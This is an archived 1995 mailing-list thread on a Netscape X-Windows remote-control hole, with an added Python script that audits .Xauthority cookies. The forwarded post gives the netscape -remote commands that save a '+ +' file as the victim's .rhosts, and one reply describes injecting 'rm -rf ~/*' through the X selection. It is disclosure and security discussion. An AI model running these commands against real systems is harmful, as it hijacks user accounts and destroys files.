Netscape hole without .Xauthority (fwd)
Haven't seen this on the cypherpunks yet, sorry if this has been here already.

Juri

<o Jüri Kaljundi e-mail: jk@digit.ee o<
o tel: +372 6308994 o> <o DigiTurg http://www.digit.ee/ o<
---------- Forwarded message ----------

There's a huge hole in the Netscape remote control mechanism for the X-Windows based clients.
Potential impact : anybody can become any user that uses Netscape on any system without sufficient X security.

Let's suppose that you have an account on a target machine, where somebody is using Netscape, and either the xhost checking is disabled, or you can set the xhost yourself (e.g. if you have an account and the target user has no .Xauthority, as is frequent in university computer rooms). Then you can gain access to the target user's account using the following steps :

- make a text file containing only "+ +" accessible (as file, as URL, or whatever you like) to the target Netscape client. This is quite easy, either if you have a personal WWW page (http://... URL) or an account on the target machine (file://... URL), or even by uploading it to an anon FTP
- set your DISPLAY environment variable to the target display
- run the following set of commands :

    netscape -noraise -remote "openURL(<put-your-URL-here>)"
    netscape -noraise -remote "saveAs(.rhosts)"
    netscape -noraise -remote back

In the second command, the path should be specified whenever possible (~ is not accepted).

If the target user does not already have a .rhosts and is not looking at that precise moment, then the chances are it worked !

Solution to the problem : every user concerned should either create a Xauthority file, or stop using Netscape.

	MXK

PS: WHY do they bother with PGP and RSA security when they keep such holes ????

+------------------------------------+---------------------------------+
| Denis AUROUX (MXK)                 | Ecole Normale Superieure        |
| 255 rue Saint-Jacques              | 45 rue d'Ulm                    |
| 75005 PARIS FRANCE                 | 75005 PARIS                     |
| email: auroux@clipper.ens.fr       | FRANCE                          |
+------------------------------------+---------------------------------+
| This .sig is SHAREWARE. If you use it often, please send me $50.     |
| After registering you will receive a fully functional .sig and all   |
| updates for free.                                                    |
+----------------------------------------------------------------------+
If your X server is not secure, then your pass phrases are not secure. If your pass phrases are not secure then private keys are compromised. If your private keys are compromised ...

She swallowed a fly! Perhaps, she'll die.

PK

--
Philip L. Karlton                    karlton@netscape.com
Principal Curmudgeon                 http://www.netscape.com/people/karlton
Netscape Communications Corporation
In message <Pine.3.89.9509291503.A1295-0100000@jamarillo>, Jyri Kaljundi writes :
[...]
There's a huge hole in the Netscape remote control mechanism for the X-Windows based clients.
Potential impact : anybody can become any user that uses Netscape on any system without sufficient X security.
[...]
PS: WHY do they bother with PGP and RSA security when they keep such holes ????
Well, I would suspect that because if your X server isn't "secure" there isn't much you can do that is. Other than xterm, most X programs will respond to "synthetic" events (events generated by another program as opposed to the user); this means with a little work anyone with access to the X server could click open the File menu, select "Open URL", type in a URL, press "Open", click "SaveAs", and so on.

Even if all X clients stopped listening to synthetic events (which would be a shame, since they are useful in various contexts), X's event structure allows multiple X clients to listen for the same events on the same windows, so a simple program could track all keystrokes and capture your passwords.

Failing all of that, any X client could track ownership of the X selection (the "cut buffer" normally used to hold text), and when it looks like a Unix command (implying that you will be pasting it into the command line) assert ownership of the selection itself and put in "^X^U^H;rm -rf ~/*" followed by a carriage return.

That's just off the top of my head (though I admit I have written two of the three "exploits" while I was a sysadmin 4 years ago in an effort to convince my managers to mandate better security than "xhost +"...). So saying "Netscape isn't secure when my X server isn't" is a lot like saying "When I leave the front door of my house unlocked my VCR isn't safe!".

--
Not speaking for my employer, or anyone other than myself.
That's called an X hole, not a netscape hole.
--
sameer                                     Voice:  510-601-9777
Community ConneXion                        FAX:    510-601-9734
An Internet Privacy Provider               Dialin: 510-658-6376
http://www.c2.org (or login as "guest")    sameer@c2.org
Jyri Kaljundi wrote:
There's a huge hole in the Netscape remote control mechanism for the X-Windows based clients. Potential impact : anybody can become any user that uses Netscape on any system without sufficient X security.
Did you bother to read the spec? This doesn't matter; if I can connect to your X server at all, you have already lost. The spec (at http://home.netscape.com/newsref/std/x-remote.html) contains:

    SECURITY CONCERNS

    Any client which can connect to your X server can control a Netscape Navigator process running there; authenticating the originator of the request is beyond the scope of this protocol. It is assumed that the underlying X security mechanisms will prevent unauthorized people from accessing your server.

    It is important (in general) that everyone be aware of the security risks associated with allowing unlimited access to your X server. Regardless of whether you use Netscape Navigator, allowing arbitrary users and hosts access to your X server is a gaping security hole. If hostile forces can connect to your server, it is trivially easy for them to execute arbitrary shell commands as you, read and write any of your files, and watch every character you type. Again, this has nothing to do with Netscape Navigator. It is a property of the X Window System.

    If you have turned off security on your X server with the xhost + command, or if you have announced that a host is ``trusted'' by using xhost or by listing that host in your /etc/X0.hosts file, then you should be aware of the consequences. If this causes access to be possible from a host which is not, in fact, trusted, then you have left your doors wide open.

    For more information about the security mechanisms one can use with an X server, consult the manual pages for X(1), Xsecurity(1), xauth(1), and xhost(1), or talk to your system administrator.

--
Jamie Zawinski    jwz@netscape.com    http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a black velvet clown painting; it's a rectangle of carets surrounding a quote from a literary giant of weeniedom like Heinlein or Dr. Who.'' -- Chris Maeda
| Jyri Kaljundi wrote:
| >
| > There's a huge hole in the Netscape remote control mechanism for the
| > X-Windows based clients.
| > Potential impact : anybody can become any user that uses Netscape on any
| > system without sufficient X security.
|
| Did you bother to read the spec? This doesn't matter; if I can
| connect to your X server at all, you have already lost. The spec
| (at http://home.netscape.com/newsref/std/x-remote.html) contains:

[snip]

This is all true, in a way. But there is a growing number of applications that contain this kind of remote execution capabilities, and whose security is dependent on Xauth. I believe that X is soon becoming the weakest link in the security chain.

I guess we don't have to discuss the quality of the 'magic cookie' RNGs, do we? Not to mention the fact that the cookie is in effect a password that is perfectly snoopable.

How common are DES-based Xauth schemes? They are not used very much, as far as I know. And if they are, as in XDM, then again, what about the RNG?

I guess this is just the distinction of breaking the glass window in the back of the house, or to pick up the front door key from beneath the "Welcome" door mat, but anyway.

-Christian
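The fix offered in the forwarded message is "create a Xauthority file", and Christian's reply asks how good the magic cookies in that file really are. The following is an added example, not code from the thread or from Netscape: it parses the ~/.Xauthority on-disk format written by libXau (a 2-byte big-endian family, then address, display number, authorization name and authorization data, each prefixed by a 2-byte big-endian length) and flags entries whose MIT-MAGIC-COOKIE-1 is missing, malformed or suspiciously low in byte diversity. The function names and the sample bytes are constructed for this example.

```python
# Added example, not from the thread: parse ~/.Xauthority (libXau on-disk
# format) and flag MIT-MAGIC-COOKIE-1 entries that look weak or malformed.
import struct

def read_field(buf, pos):
    # One length-prefixed field: 2-byte big-endian length, then that many bytes.
    n = struct.unpack(">H", buf[pos:pos + 2])[0]
    if pos + 2 + n > len(buf):
        raise ValueError("truncated .Xauthority field")
    return buf[pos + 2:pos + 2 + n], pos + 2 + n

def parse_xauthority(buf):
    # Each entry: family (u16), then address, display number, auth name, auth data.
    entries, pos = [], 0
    while pos < len(buf):
        family, pos = struct.unpack(">H", buf[pos:pos + 2])[0], pos + 2
        address, pos = read_field(buf, pos)
        number, pos = read_field(buf, pos)
        name, pos = read_field(buf, pos)
        cookie, pos = read_field(buf, pos)
        entries.append({"family": family, "address": address.decode("latin-1"),
                        "display": number.decode("ascii"),
                        "name": name.decode("ascii"), "cookie": cookie})
    return entries

def audit_cookies(entries):
    # Return (host:display, reason) pairs a sysadmin should look at.
    findings = []
    for e in entries:
        tag = f"{e['address']}:{e['display']}"
        if e["name"] != "MIT-MAGIC-COOKIE-1":
            findings.append((tag, f"unexpected auth scheme {e['name']}"))
        elif len(e["cookie"]) != 16:
            findings.append((tag, f"cookie is {len(e['cookie'])} bytes, expected 16"))
        elif len(set(e["cookie"])) < 8:
            # 16 bytes from a sound generator almost never collapse to so few
            # distinct values; this catches the weak-RNG worry raised above.
            findings.append((tag, "cookie has very low byte diversity"))
    return findings

def encode_entry(family, address, number, name, cookie):
    # Serialise one entry in the on-disk format (used for the constructed sample).
    out = struct.pack(">H", family)
    for f in (address, number, name, cookie):
        out += struct.pack(">H", len(f)) + f
    return out

# Constructed sample: a sane cookie for hostA:0 (FamilyLocal = 256) and a
# zero-filled cookie for hostB:0, the kind of entry the audit should flag.
SAMPLE = (encode_entry(256, b"hostA", b"0", b"MIT-MAGIC-COOKIE-1", bytes(range(0x10, 0x20)))
          + encode_entry(256, b"hostB", b"0", b"MIT-MAGIC-COOKIE-1", b"\x00" * 16))
```

Run `audit_cookies(parse_xauthority(open(path, "rb").read()))` against a real file to list the entries worth a second look; the diversity test is a coarse screen, not a substitute for a proper randomness audit of the generator.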
good points, Christian!

more and more, networks are becoming flooded with X traffic. although X has always been known to be a potential security hole, i think X-attacks are going to increase dramatically in the coming months. i commonly hear of sites with Xauthority enabled, only to have the user community type "xhost +" at the prompt. bad karma. the days of pumping rude & crass noises to someone else's workstation will soon graduate to more nefarious and insidious attacks.

is anyone looking into a means of securing X (above and beyond the current weak solutions)?

regards,
--robert

--
o robert owen thomas: unix consultant. cymro ydw i. user scratching post. o
o e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com            o
o vox: 708.435.7076  fax: 708.435.7360                                    o
o "When I die, I want to go sleeping like my grandfather...               o
o  Not screaming like the passengers in his car."                         o
participants (7)

- Christian Wettergren
- Jamie Zawinski
- Josh M. Osborne
- Jyri Kaljundi
- karlton
- rthomas@pamd.cig.mot.com
- sameer